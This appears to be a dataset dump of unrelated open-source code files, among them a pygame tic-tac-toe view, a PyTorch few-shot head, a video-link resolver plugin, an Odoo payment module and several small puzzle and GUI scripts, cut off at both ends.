NotImplementedError\n torch.testing.assert_allclose(expected_mean, samples.type(expected_mean.dtype).mean(0),\n atol=3.0 * samples.type(expected_mean.dtype).std(), rtol=0.0)\n\n def test_mutate(self):\n spaces = [\n DiscreteSpace(5, mutation_mean=2.0, mutation_std=1.0, indpb=0.9),\n BoxSpace(low=0, high=255, shape=(2,), dtype=torch.uint8, mutation_mean=0.0, mutation_std=1.0, indpb=0.9),\n BoxSpace(low=0, high=255, shape=(2,), dtype=torch.float64, mutation_mean=0.0, mutation_std=1.0, indpb=0.9),\n MultiDiscreteSpace(nvec=(5, 2, 2), mutation_mean=(0.0, 0.4, 0.0), mutation_std=(1.0, 1.4, 0.0),\n indpb=(0.9, 0.8, 1.0)),\n MultiBinarySpace(n=10, indpb=(0.0, 0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9))\n ]\n\n for space in spaces:\n n_trials = 100\n samples = torch.stack([space.sample() for _ in range(n_trials)])\n mutated_samples = torch.stack([space.mutate(sample) for sample in samples])\n assert samples.dtype == mutated_samples.dtype\n assert samples.shape == mutated_samples.shape\n for mutated_sample in mutated_samples:\n assert space.contains(mutated_sample)\n delta_mutation = mutated_samples.double() - samples.double()\n if not isinstance(space, MultiBinarySpace):\n assert torch.all((delta_mutation.mean(0) - space.mutation_mean).abs() <= 3.0 * space.mutation_std)\n else:\n assert torch.all(((mutated_samples - samples).abs().sum(0).double() - (\n n_trials * space.indpb)).abs() <= n_trials / 10)\n\n def test_class_inequality(self):\n space_tuples = [\n (DiscreteSpace(5), MultiBinarySpace(5)),\n (BoxSpace(low=torch.tensor([-10, 0]), high=torch.tensor([10, 10]), dtype=torch.float32),\n MultiDiscreteSpace([2, 2, 8])),\n (BoxSpace(low=0, high=255, shape=(64, 64, 3), dtype=torch.uint8),\n BoxSpace(low=0, high=255, shape=(32, 32, 3), dtype=torch.uint8)),\n (DictSpace({\"position\": DiscreteSpace(5)}), TupleSpace([DiscreteSpace(5)])),\n (DictSpace({\"position\": DiscreteSpace(5)}), DiscreteSpace(5)),\n (TupleSpace((DiscreteSpace(5),)), DiscreteSpace(5)),\n (BoxSpace(low=torch.tensor([-float('inf'), 0.]), high=torch.tensor([0., float('inf')])),\n BoxSpace(low=torch.tensor([-float('inf'), 1.]), high=torch.tensor([0., float('inf')])))\n ]\n for space_tuple in space_tuples:\n assert space_tuple[0] == space_tuple[0]\n assert space_tuple[1] == space_tuple[1]\n assert space_tuple[0] != space_tuple[1]\n assert space_tuple[1] != space_tuple[0]\n\n def test_bad_space_calls(self):\n space_fns = [\n lambda: DictSpace(space1='abc'),\n lambda: DictSpace({'space1': 'abc'}),\n lambda: TupleSpace(['abc'])\n ]\n\n for space_fn in space_fns:\n with self.assertRaises(AssertionError):\n space_fn()\n","repo_name":"mayalenE/evocraftsearch","sub_path":"spaces/tests/test_spaces.py","file_name":"test_spaces.py","file_ext":"py","file_size_in_byte":7512,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"6230721949","text":"\"\"\"This is the view for the game.\n\nThere's an image of what I want the board to look like,\n\"../data/board_snapshot.png\". I'm using that image to figure out the\npositions of everything on the board.\n\n\"\"\"\n\nimport pygame\nfrom pygame.locals import *\n\nfrom pydispatch import dispatcher\n\nfrom data import load_image\nfrom model import invert, RED, BLUE, BLANK, SIZE, STATUS_WINNER\nfrom scheduler import scheduler\n\n__docformat__ = 'restructuredtext'\n\nSCREEN_WIDTH = 1024\nSCREEN_HEIGHT = 768\nBOARD_WIDTH = 402\nBOARD_HEIGHT = 700\nSQUARE_WIDTH = 101\nSQUARE_HEIGHT = 42\nBALL_WIDTH = 57\nBALL_HEIGHT = 57\nBOARD_OFFSET_BOTTOM = 37\nBOARD_OFFSET_LEFT = 46\nZ_OFFSET_BOTTOM = 243\nY_OFFSET_BOTTOM = 69\nY_OFFSET_LEFT = 46\nX_OFFSET_LEFT = 106\nBALL_OFFSET_BOTTOM = 20\nBALL_OFFSET_LEFT = 22\nANTIALIASED = True\nDEFAULT_FONT_SIZE = 48\nWHITE = (255, 255, 255)\nDEFAULT_FONT_COLOR = WHITE\nTEXT_LEFT = 598\nLEVEL_TOP = 62\nMENU_TOP = 697\nLEFT = 0\nTOP = 1\nMAX_SHOWABLE_STATUS_LINES = 3\nANIMATED_PAUSE = 400\n\n\nclass Board(pygame.sprite.OrderedUpdates):\n\n \"\"\"This is a rendering group for all the pieces of the board.\n\n This is a subclass of pygame.sprite.OrderedUpdates. Hence, the key\n line is ``pygame.display.update(board.draw(screen))``.\n\n The following attributes are used:\n\n balls\n This is a dict mapping tuples of the form ``(x, y, z)`` to\n sprites. There is one ball for every square, and they're created\n ahead of time.\n\n \"\"\"\n\n def __init__(self, game_model, *args, **kargs):\n \"\"\"Create all the Squares and Balls.\"\"\"\n pygame.sprite.OrderedUpdates.__init__(self, *args, **kargs)\n self.balls = {}\n for xyz in game_model.iter_xyz():\n square_model = game_model.board[xyz]\n square_view = Square(square_model)\n self.add(square_view)\n self.balls[xyz] = Ball(self, square_model, square_view)\n\n\nclass Square(pygame.sprite.Sprite):\n\n \"\"\"This represents one square on the board.\n\n The following attributes are used:\n\n square_model\n This is the associated instance of model.Square.\n\n \"\"\"\n\n def __init__(self, square_model):\n \"\"\"Setup the square, including position.\"\"\"\n pygame.sprite.Sprite.__init__(self)\n self.square_model = square_model\n self.image = load_image('normal_square.png')\n self.rect = self.image.get_rect()\n (x, y, z) = square_model.xyz\n # I'm inverting the y to match model.Game.__repr__.\n self.rect.bottom = (SCREEN_HEIGHT - (BOARD_OFFSET_BOTTOM +\n z * Z_OFFSET_BOTTOM +\n invert(y) * Y_OFFSET_BOTTOM))\n self.rect.left = (BOARD_OFFSET_LEFT + invert(y) * Y_OFFSET_LEFT +\n x * X_OFFSET_LEFT)\n dispatcher.connect(self.handle_board_changed, 'BOARD CHANGED')\n\n def handle_board_changed(self):\n \"\"\"Am I special or not?\"\"\"\n name = self.square_model.special and 'special' or 'normal'\n # This is pretty much a NULL operation unless name has changed.\n self.image = load_image('%s_square.png' % name)\n\n\nclass Ball(pygame.sprite.Sprite):\n\n \"\"\"This represense a ball on a square.\n\n The following attributes are used:\n\n board\n This is the rendering group. This ball adds itself to the board\n in order to be rendered on an as needed basis.\n\n square_model\n This is the associated instance of model.Square.\n\n \"\"\"\n\n def __init__(self, board, square_model, square_view):\n \"\"\"Setup the ball, including position.\"\"\"\n pygame.sprite.Sprite.__init__(self)\n self.board = board\n self.square_model = square_model\n self.image = load_image('red_ball.png') # Irrelevent which one.\n self.rect = self.image.get_rect()\n self.rect.bottom = square_view.rect.bottom - BALL_OFFSET_BOTTOM\n self.rect.left = square_view.rect.left + BALL_OFFSET_LEFT\n dispatcher.connect(self.handle_board_changed, signal='BOARD CHANGED')\n dispatcher.connect(self.handle_score_changed, signal='SCORE CHANGED')\n\n def handle_board_changed(self):\n \"\"\"Update based on changes to the board.\"\"\"\n if self.square_model.value == BLANK and self.alive():\n self.remove(self.board)\n elif self.square_model.value != BLANK and not self.alive():\n self.add(self.board)\n self.fix_color()\n\n def handle_score_changed(self, xyzs_included=[]):\n \"\"\"Highlight the balls involved.\n\n We can assume they're already setup.\n\n \"\"\"\n if self.square_model.xyz in xyzs_included:\n self.image = load_image('green_ball.png')\n scheduler.set_timer(ANIMATED_PAUSE, self.fix_color)\n\n def fix_color(self):\n \"\"\"Set the color to whatever it's supposed to be.\"\"\"\n for color in ('RED', 'BLUE'):\n if self.square_model.value == globals()[color]:\n # This is pretty much a NULL operation unless it's changed.\n self.image = load_image('%s_ball.png' % color.lower())\n\n\nclass ScoreBoard(pygame.sprite.RenderUpdates):\n\n \"\"\"This is a rendering group for all the supplemental text.\n\n The following attributes are used:\n\n game_model\n Some of the sprites need this.\n\n cursor\n This is the topleft of where to insert the next sprite.\n\n \"\"\"\n\n def __init__(self, game_model, *args, **kargs):\n \"\"\"Create all the sprites.\"\"\"\n pygame.sprite.RenderUpdates.__init__(self, *args, **kargs)\n self.game_model = game_model\n self.cursor = [TEXT_LEFT, LEVEL_TOP]\n for constructor in (LevelLabel, ScoreLabel, TurnLabel, SpecialLabel):\n self.print_sprite(constructor(game_model))\n for i in range(2):\n self.print_sprite(\"\")\n for i in range(MAX_SHOWABLE_STATUS_LINES):\n self.print_sprite(StatusLabel(game_model, i))\n self.cursor[TOP] = MENU_TOP\n for text in (\"(H)elp \", \"(R)eset \", \"(Q)uit \"):\n self.print_sprite(text, newline=False)\n\n def print_sprite(self, sprite, newline=True):\n \"\"\"Output the sprite at the cursor and update the cursor.\n\n sprite\n This is the sprite to print. If you just give me a string,\n I'll wrap it for you in a sprite.\n\n newline\n Should we wrap?\n\n Also, self.add it.\n\n \"\"\"\n if isinstance(sprite, basestring):\n sprite = SmartLabel(default_text=sprite)\n sprite.rect.topleft = self.cursor\n self.add(sprite)\n if newline:\n self.cursor[TOP] += sprite.rect.height\n else:\n self.cursor[LEFT] += sprite.rect.width\n\n\nclass SmartLabel(pygame.sprite.Sprite):\n\n \"\"\"This is a label that is smart enough to respond to model changes.\n\n The following attributes are used:\n\n game_model\n Just in case you need to get values out of it. This base class\n doesn't use it.\n\n font\n I'll setup a default font.\n\n signals_to_listen_for\n By default, this is ().\n\n default_text\n You can pass this to the constructor.\n\n \"\"\"\n\n signals_to_listen_for = ()\n\n def __init__(self, game_model=None, default_text=\"\"):\n \"\"\"Grab the args, setup the signals, etc.\"\"\"\n pygame.sprite.Sprite.__init__(self)\n self.game_model = game_model\n self.font = pygame.font.Font(None, DEFAULT_FONT_SIZE)\n for signal in self.signals_to_listen_for:\n dispatcher.connect(self.handle_signal, signal=signal)\n self.default_text = default_text\n self.draw_text(self.calc_text())\n\n def handle_signal(self, signal):\n \"\"\"Respond to the signal.\n\n Feel free to override this and actually make use of the signal,\n etc.\n\n \"\"\"\n self.draw_text(self.calc_text())\n\n def calc_text(self):\n \"\"\"What text should we write?\"\"\"\n return self.default_text\n\n def draw_text(self, text):\n \"\"\"Draw the text.\"\"\"\n self.image = self.font.render(text, ANTIALIASED, DEFAULT_FONT_COLOR)\n # Don't lose the topleft, *if* it has one.\n orig_rect = getattr(self, \"rect\", None)\n self.rect = self.image.get_rect()\n if orig_rect is not None:\n self.rect.topleft = orig_rect.topleft\n\n\ndef square_value_to_string(value):\n \"\"\"Given RED or BLUE, return 'Red' or 'Blue'.\"\"\"\n return {RED: \"Red\", BLUE: \"Blue\"}[value]\n\n\nclass LevelLabel(SmartLabel):\n\n \"\"\"Show the level.\"\"\"\n\n signals_to_listen_for = (\"LEVEL CHANGED\",)\n\n def calc_text(self):\n # Don't let the level go above SIZE at the end of the game.\n return 'Level: %s' % min(self.game_model.current_level + 1, SIZE)\n\n\nclass ScoreLabel(SmartLabel):\n\n \"\"\"Show the score.\"\"\"\n\n signals_to_listen_for = (\"SCORE CHANGED\",)\n\n def calc_text(self):\n scores = self.game_model.scores\n return \"Red: %02d Blue: %02d\" % (scores[RED], scores[BLUE])\n\n\nclass TurnLabel(SmartLabel):\n\n \"\"\"Show whose turn it is.\"\"\"\n\n signals_to_listen_for = (\"PLAYER CHANGED\",)\n\n def calc_text(self):\n current_player = self.game_model.current_player\n who = square_value_to_string(current_player)\n return \"Current Player: %s\" % who\n\n\nclass SpecialLabel(SmartLabel):\n\n \"\"\"Tell the user if the next move is special.\"\"\"\n\n signals_to_listen_for = (\"PLAYER CHANGED\",)\n\n def calc_text(self):\n return (\"Next Square: %s\" % \n (self.game_model.current_move_special and \"Special!\" or\n \"Normal\"))\n\n\nclass StatusLabel(SmartLabel):\n\n \"\"\"Each of these shows one line of status.\"\"\"\n\n signals_to_listen_for = (\"STATUS CHANGED\",)\n\n def __init__(self, game_model, line_number):\n self.line_number = line_number # Must come first.\n SmartLabel.__init__(self, game_model)\n\n def calc_text(self):\n try:\n (fmt, args) = self.game_model.status[self.line_number]\n if fmt == STATUS_WINNER:\n # \"Red\" not \"X\".\n args = (square_value_to_string(args[0]),)\n return fmt % args\n except IndexError:\n return \"\"\n","repo_name":"jjinux/tictactoe3","sub_path":"lib/view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":10100,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"14383834784","text":"#coding=gbk\n#给你一个字符串 s 和一个字符规律 p, 支持 '.' 和 '*' 的正则表达式匹配\n\n\n'''\n动态规划,用 f[i][j] 表示 s的前 i 个字符与 p 中的前 j 个字符是否能够匹配\n'''\n\nclass Solution:\n def ismatch(self, s, p):\n m = len(s)\n n = len(p)\n def matches(i, j):\n if i == 0:\n return False\n if p[j-1] == '.':\n return True\n return s[i-1] == p[j-1]\n\n f = [[False] * (n + 1) for _ in range(m + 1)]\n f[0][0] = True\n for i in range(m + 1):\n for j in range(1, n + 1):\n if p[j - 1] == '*':\n f[i][j] |= f[i][j - 2]\n if matches(i, j - 1):\n f[i][j] |= f[i - 1][j]\n else:\n if matches(i, j):\n f[i][j] |= f[i - 1][j - 1]\n return f[m][n]\ns = \"aab\"\np = \"c*a*b\"\na = Solution()\ncc = a.ismatch(s, p)\nprint(cc)","repo_name":"xiawq1/leetcode-c-","sub_path":"leetcode/match.py","file_name":"match.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"44819514298","text":"import logging\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nimport utils\nfrom models.model import register\n\nlogger = logging.getLogger(__name__)\n\n\n@register('meta_baseline')\nclass MetaBaseline(nn.Module):\n\n def __init__(self, method='cos', temp=10., temp_learnable=True):\n super().__init__()\n self.method = method\n\n if temp_learnable:\n self.temp = nn.Parameter(torch.tensor(temp))\n else:\n self.temp = temp\n\n def forward(self, x_shot_feat, x_query_feat, batch_size, n_way, n_shot, n_query):\n shot_shape = [batch_size, n_way, n_shot]\n query_shape = [batch_size, n_query]\n\n x_shot = x_shot_feat.view(*shot_shape, -1)\n x_query = x_query_feat.view(*query_shape, -1)\n\n if self.method == 'cos':\n x_shot = x_shot.mean(dim=-2)\n x_shot = F.normalize(x_shot, dim=-1) # [ep_per_batch, way, feature_len]\n x_query = F.normalize(x_query, dim=-1) # [ep_per_batch, query, feature_len]\n metric = 'dot'\n elif self.method == 'sqr':\n x_shot = x_shot.mean(dim=-2)\n metric = 'sqr'\n\n logits = utils.compute_logits(\n x_query, x_shot, metric=metric, temp=self.temp) # [ep_per_batch, query, way]\n return logits\n","repo_name":"joyjayng/Bongard-OpenWorld","sub_path":"models/head/meta_baseline.py","file_name":"meta_baseline.py","file_ext":"py","file_size_in_byte":1304,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"71198438246","text":"import re\nfrom lib import jsunpack\nfrom lib import helpers\nfrom resolveurl import common\nfrom resolveurl.resolver import ResolveUrl, ResolverError\nimport string\n\nrot13 = string.maketrans(\n \"ABCDEFGHIJKLMabcdefghijklmNOPQRSTUVWXYZnopqrstuvwxyz\",\n \"NOPQRSTUVWXYZnopqrstuvwxyzABCDEFGHIJKLMabcdefghijklm\")\n\nclass CdaResolver(ResolveUrl):\n name = \"cda\"\n domains = ['cda.pl', 'www.cda.pl', 'ebd.cda.pl']\n pattern = '(?://|\\.)(cda\\.pl)/(?:.\\d+x\\d+|video)/([0-9a-zA-Z]+)'\n\n def __init__(self):\n self.net = common.Net()\n\n def get_media_url(self, host, media_id):\n web_url = self.get_url(host, media_id)\n headers = {'Referer': web_url, 'User-Agent': common.CHROME_USER_AGENT}\n\t\t\n player_headers = {'Cookie': 'PHPSESSID=1', 'Referer': web_url, 'User-Agent': common.CHROME_USER_AGENT}\n player_headers.update(headers)\n\n html = self.net.http_GET(web_url, headers=headers).content\n try: html = html.encode('utf-8')\n except: pass\n match = re.findall('data-quality=\"(.*?)\" href=\"(.*?)\".*?>(.*?)', html, re.DOTALL)\n if match:\n mylinks = sorted(match, key=lambda x: x[2])\n html = self.net.http_GET(mylinks[-1][1], headers=headers).content\n \n from HTMLParser import HTMLParser\n match = re.search('''['\"]file['\"]:\\s*['\"](.+?)['\"]''', HTMLParser().unescape(html))\n if match:\n mylink = match.group(1).replace(\"\\\\\", \"\")\n return self.__check_vid(mylink) + helpers.append_headers(player_headers)\n\n html = jsunpack.unpack(re.search(\"eval(.*?)\\{\\}\\)\\)\", html, re.DOTALL).group(1))\n match = re.search('src=\"(.*?\\.mp4)\"', html)\n if match:\n return self.__check_vid(match.group(1)) + helpers.append_headers(player_headers)\n\n raise ResolverError('Video Link Not Found')\n\n def __check_vid(self, video_link):\n if re.match('uggc', video_link):\n video_link = string.translate(video_link, rot13)\n video_link = video_link[:-7] + video_link[-4:]\n return video_link\n\n def get_url(self, host, media_id):\n return 'http://ebd.cda.pl/647x500/%s' % media_id\n","repo_name":"jsergio123/script.module.resolveurl","sub_path":"lib/resolveurl/plugins/cda.py","file_name":"cda.py","file_ext":"py","file_size_in_byte":2171,"program_lang":"python","lang":"en","doc_type":"code","stars":111,"dataset":"github-code","pt":"52"} +{"seq_id":"8745105117","text":"import sys\nfrom PySide2.QtCore import Qt\nfrom PySide2.QtWidgets import *\n\n\nclass Example(QWidget):\n\n def __init__(self):\n super(Example, self).__init__()\n\n self.initUI()\n\n def initUI(self):\n\n lcd = QLCDNumber(self)\n sld = QSlider(Qt.Horizontal, self)\n\n vbox = QVBoxLayout()\n vbox.addWidget(lcd)\n vbox.addWidget(sld)\n\n self.setLayout(vbox)\n sld.valueChanged.connect(lcd.display)\n\n self.setGeometry(300, 300, 250, 150)\n self.setWindowTitle('Signal & slot')\n self.show()\n\n\ndef start():\n #global form\n start.form = Example()\n start.form.show()\n\nstart()","repo_name":"syurskyi/Python_Topics","sub_path":"140_gui/pyqt_pyside/examples/zetcode/004_Events and signals/005_Connect_of_signal_QSlider_to_slotQLCDNumber.py","file_name":"005_Connect_of_signal_QSlider_to_slotQLCDNumber.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"969307822","text":"class Solution:\n def longestCommonSubsequence(self, text1: str, text2: str) -> int:\n n, m = len(text1), len(text2)\n dp = [[0 for _ in range(m)] for _ in range(n)]\n\n for i in range(n):\n for j in range(m):\n if text1[i] == text2[j]:\n dp[i][j] = 1 + (dp[i - 1][j - 1] if i - 1 >= 0 and j - 1 >= 0 else 0)\n else:\n dp[i][j] = max(\n dp[i - 1][j] if i - 1 >= 0 else 0,\n dp[i][j - 1] if j - 1 >= 0 else 0\n )\n\n return dp[n - 1][m - 1]","repo_name":"mathewhany/leetcode-solutions","sub_path":"1250-longest-common-subsequence/1250-longest-common-subsequence.py","file_name":"1250-longest-common-subsequence.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"75093028963","text":"from tkinter import *\nfrom quiz_brain import QuizBrain\nTHEME_COLOR = \"#375362\"\n\nclass UserInterface:\n\n def __init__(self, quiz_brain: QuizBrain):\n self.quiz = quiz_brain\n\n self.window = Tk()\n self.window.title(\"Quizzler\")\n self.window.config(bg=THEME_COLOR, padx=20, pady=20)\n\n self.score_label = Label(text=\"Score : 0\", fg=\"white\", bg=THEME_COLOR, font=(20))\n self.score_label.grid(row=0, column=1)\n\n self.canvas = Canvas(width=300, height=250, bg=\"white\")\n self.question_text = self.canvas.create_text(150, 125,width=280, text=\"Some question text\", fill=THEME_COLOR, font=(\"Arial\",18,\"italic\"))\n self.canvas.grid(row=1, column=0, columnspan=2, pady=50)\n\n check_mark_image = PhotoImage(file=\"images/true.png\")\n self.check_mark = Button(image=check_mark_image, highlightthickness=0, command=self.check_mark_pressed, border=0)\n self.check_mark.grid(row=2, column=0)\n\n cross_mark_image = PhotoImage(file=\"images/false.png\")\n self.cross_mark = Button(image=cross_mark_image, highlightthickness=0, command=self.cross_mark_pressed, border=0)\n self.cross_mark.grid(row=2, column=1)\n self.get_next_question()\n self.window.mainloop()\n\n def get_next_question(self):\n if self.quiz.still_has_questions():\n self.canvas.config(bg=\"white\")\n self.score_label.config(text=f\"Score:{self.quiz.score}\")\n q_text = self.quiz.next_question()\n self.canvas.itemconfig(self.question_text, text=q_text)\n else:\n self.canvas.config(bg=\"white\")\n self.canvas.itemconfig(self.question_text, text=\"You have reached the end of the quiz\")\n self.check_mark.config(state=\"disabled\")\n self.cross_mark.config(state=\"disabled\")\n\n\n def check_mark_pressed(self):\n is_correct = self.quiz.check_answer(\"True\")\n print(is_correct)\n self.feedback(is_correct)\n\n def cross_mark_pressed(self):\n is_correct = self.quiz.check_answer(\"False\")\n print(is_correct)\n self.feedback(is_correct)\n\n def feedback(self, is_correct):\n if is_correct:\n self.canvas.config(bg=\"green\")\n else:\n self.canvas.config(bg=\"red\")\n self.window.after(1000, self.get_next_question)\n","repo_name":"mehtavandit/100-days-of-code","sub_path":"day 034/ui.py","file_name":"ui.py","file_ext":"py","file_size_in_byte":2326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"34001321441","text":"import time\n\nfrom psu.QJ3005P import PSU\n\nif __name__ == '__main__':\n results = []\n with PSU('COM3') as psu:\n if not psu.is_available():\n print('PSU does not answer. Please check your setup.')\n else:\n psu.disable()\n psu.set(volt=4, amps=.001)\n psu.enable()\n time.sleep(3)\n for milli_amps in range(2, 21):\n psu.amps = float(milli_amps) / 1000\n time.sleep(1)\n readings = psu.get()\n results.append((readings.amps, readings.volt))\n psu.disable()\n with open('green_led.csv', 'w') as output:\n print('forward current [mA],forward voltage [V],power [mW]', file=output)\n for pair in results:\n amps, volt = pair\n print(f'{amps * 1000:3.0f},{volt:5.2f},{amps * 1000 * volt:4.0f}', file=output)\n","repo_name":"techrabbit58/QL3005P","sub_path":"examples/led_characteristic.py","file_name":"led_characteristic.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"31152657259","text":"from odoo import api, fields, models, _\n\nclass account_payment(models.Model):\n _inherit = 'account.payment'\n\n @api.onchange('journal_id')\n def _onchange_journal(self):\n res = super(account_payment, self)._onchange_journal()\n for record in self:\n if record.journal_id.type == 'bank':\n self.show_bank_charges = True\n else:\n self.show_bank_charges = False\n self.bank_account_id = ''\n self.bank_charges_boolean = False\n return res\n\n @api.one\n @api.depends('invoice_ids', 'amount', 'payment_date', 'currency_id', 'bank_charges_amount', 'bank_charges_boolean')\n def _compute_payment_difference(self):\n if len(self.invoice_ids) == 0:\n return\n if self.invoice_ids[0].type in ['in_invoice', 'out_refund']:\n self.payment_difference = self.amount - self._compute_total_invoices_amount()\n else:\n if self.bank_charges_boolean and self.bank_charges_amount:\n self.payment_difference = self._compute_total_invoices_amount() - self.amount - self.bank_charges_amount\n else:\n self.payment_difference = self._compute_total_invoices_amount() - self.amount\n\n # bank_payment_difference_handling = fields.Selection([('open', 'Keep open'), ('reconcile', 'Mark invoice as fully paid')], default='open', string=\"Payment Difference\", copy=False)\n bank_charges_boolean =fields.Boolean('Bank Charges')\n show_bank_charges = fields.Boolean('Show Bank Charges')\n bank_account_id = fields.Many2one('account.account', 'Expense Account')\n bank_charges_amount = fields.Monetary('Amount')\n\n\n @api.onchange('bank_charges_boolean')\n def onchange_bank_charges_boolean(self):\n result = {}\n if self.bank_charges_boolean:\n model_data = self.env['ir.model.data']\n bank_type_ids = model_data.get_object_reference('account', 'data_account_type_expenses')[1]\n result['domain'] = {'bank_account_id': [('user_type_id', '=', bank_type_ids)]}\n else:\n self.bank_charges_amount = ''\n return result\n\n def _create_payment_entry(self, amount):\n \"\"\" Create a journal entry corresponding to a payment, if the payment references invoice(s) they are reconciled.\n Return the journal entry.\n \"\"\"\n aml_obj = self.env['account.move.line'].with_context(check_move_validity=False)\n invoice_currency = False\n if self.invoice_ids and all([x.currency_id == self.invoice_ids[0].currency_id for x in self.invoice_ids]):\n #if all the invoices selected share the same currency, record the paiement in that currency too\n invoice_currency = self.invoice_ids[0].currency_id\n debit, credit, amount_currency, currency_id = aml_obj.with_context(date=self.payment_date).compute_amount_fields(amount, self.currency_id, self.company_id.currency_id, invoice_currency)\n\n move = self.env['account.move'].create(self._get_move_vals())\n\n #Write line corresponding to invoice payment\n counterpart_aml_dict = self._get_shared_move_line_vals(debit, credit, amount_currency, move.id, False)\n counterpart_aml_dict.update(self._get_counterpart_move_line_vals(self.invoice_ids))\n counterpart_aml_dict.update({'currency_id': currency_id})\n counterpart_aml = aml_obj.create(counterpart_aml_dict)\n\n #Reconcile with the invoices\n if self.payment_difference_handling == 'reconcile' and self.payment_difference:\n writeoff_line = self._get_shared_move_line_vals(0, 0, 0, move.id, False)\n amount_currency_wo, currency_id = aml_obj.with_context(date=self.payment_date).compute_amount_fields(self.payment_difference, self.currency_id, self.company_id.currency_id, invoice_currency)[2:]\n # the writeoff debit and credit must be computed from the invoice residual in company currency\n # minus the payment amount in company currency, and not from the payment difference in the payment currency\n # to avoid loss of precision during the currency rate computations. See revision 20935462a0cabeb45480ce70114ff2f4e91eaf79 for a detailed example.\n total_residual_company_signed = sum(invoice.residual_company_signed for invoice in self.invoice_ids)\n total_payment_company_signed = self.currency_id.with_context(date=self.payment_date).compute(self.amount, self.company_id.currency_id)\n if self.invoice_ids[0].type in ['in_invoice', 'out_refund']:\n amount_wo = total_payment_company_signed - total_residual_company_signed\n else:\n amount_wo = total_residual_company_signed - total_payment_company_signed\n # Align the sign of the secondary currency writeoff amount with the sign of the writeoff\n # amount in the company currency\n if amount_wo > 0:\n debit_wo = amount_wo\n credit_wo = 0.0\n amount_currency_wo = abs(amount_currency_wo)\n else:\n debit_wo = 0.0\n credit_wo = -amount_wo\n amount_currency_wo = -abs(amount_currency_wo)\n if self.payment_difference_handling == 'reconcile':\n account_id = self.writeoff_account_id.id\n label = _('Counterpart')\n elif self.bank_charges_boolean == True:\n account_id = self.bank_account_id.id\n label = _('Bank Charges')\n writeoff_line['name'] =label\n writeoff_line['account_id'] = account_id\n writeoff_line['debit'] = debit_wo\n writeoff_line['credit'] = credit_wo\n writeoff_line['amount_currency'] = amount_currency_wo\n writeoff_line['currency_id'] = currency_id\n writeoff_line = aml_obj.create(writeoff_line)\n if counterpart_aml['debit']:\n counterpart_aml['debit'] += credit_wo - debit_wo\n if counterpart_aml['credit']:\n counterpart_aml['credit'] += debit_wo - credit_wo\n counterpart_aml['amount_currency'] -= amount_currency_wo\n # self.invoice_ids.register_payment(counterpart_aml)\n\n elif self.payment_difference_handling != 'reconcile' and self.bank_charges_boolean and self.bank_charges_amount:\n bank_charges_line = self._get_shared_move_line_vals(0, 0, 0, move.id, False)\n amount_currency_wo, currency_id = aml_obj.with_context(date=self.payment_date).compute_amount_fields(self.payment_difference, self.currency_id, self.company_id.currency_id, invoice_currency)[2:]\n total_residual_company_signed = sum(invoice.residual_company_signed for invoice in self.invoice_ids)\n total_payment_company_signed = self.currency_id.with_context(date=self.payment_date).compute( self.bank_charges_amount, self.company_id.currency_id)\n\n if total_payment_company_signed > 0:\n debit_wo = total_payment_company_signed\n credit_wo = 0.0\n amount_currency_wo = abs(amount_currency_wo)\n else:\n debit_wo = 0.0\n credit_wo = -total_payment_company_signed\n amount_currency_wo = -abs(amount_currency_wo)\n account_id = self.bank_account_id.id\n label = _('Bank Charges')\n bank_charges_line['name'] = label\n bank_charges_line['account_id'] = self.bank_account_id.id\n bank_charges_line['debit'] = debit_wo\n bank_charges_line['credit'] = credit_wo\n bank_charges_line['amount_currency'] = amount_currency_wo\n bank_charges_line['currency_id'] = currency_id\n bank_charges_line = aml_obj.create(bank_charges_line)\n if counterpart_aml['debit']:\n counterpart_aml['debit'] += credit_wo - debit_wo\n if counterpart_aml['credit']:\n counterpart_aml['credit'] += debit_wo - credit_wo\n counterpart_aml['amount_currency'] -= amount_currency_wo\n self.invoice_ids.register_payment(counterpart_aml)\n\n #Write counterpart lines\n if not self.currency_id != self.company_id.currency_id:\n amount_currency = 0\n liquidity_aml_dict = self._get_shared_move_line_vals(credit, debit, -amount_currency, move.id, False)\n liquidity_aml_dict.update(self._get_liquidity_move_line_vals(-amount))\n aml_obj.create(liquidity_aml_dict)\n\n move.post()\n return move","repo_name":"Muhammad-SF/Test","sub_path":"core/sales_bankcharges/models/sales_bank_charges.py","file_name":"sales_bank_charges.py","file_ext":"py","file_size_in_byte":8543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"26239837632","text":"# -*- coding: utf-8 -*-\n\n'''\n// 面试题45:把数组排成最小的数\n// 题目:输入一个正整数数组,把数组里所有数字拼接起来排成一个数,打印能拼\n// 接出的所有数字中最小的一个。例如输入数组{3, 32, 321},则打印出这3个数\n// 字能排成的最小数字321323。\n\n同 LeetCode 179: https://leetcode.com/problems/largest-number/\n'''\n\nclass Solution(object):\n def solver(self, nums):\n if not nums:\n return [ ]\n target = str( nums[0] )\n first = []\n last = []\n same = 1\n for num in nums[1:]:\n if target == num:\n same += 1\n continue\n if target + str(num) < str(num) + target:\n last.append( num )\n else:\n first.append( num )\n return self.solver( first ) + [ target ]*same + self.solver( last )\n \n def smallestNumber(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: str\n \"\"\"\n if not nums:\n return \"\"\n if len( set(nums) ) == 1 and nums[0] == 0:\n return \"0\"\n \n sortNum = self.solver( nums )\n \n return \"\".join( sortNum 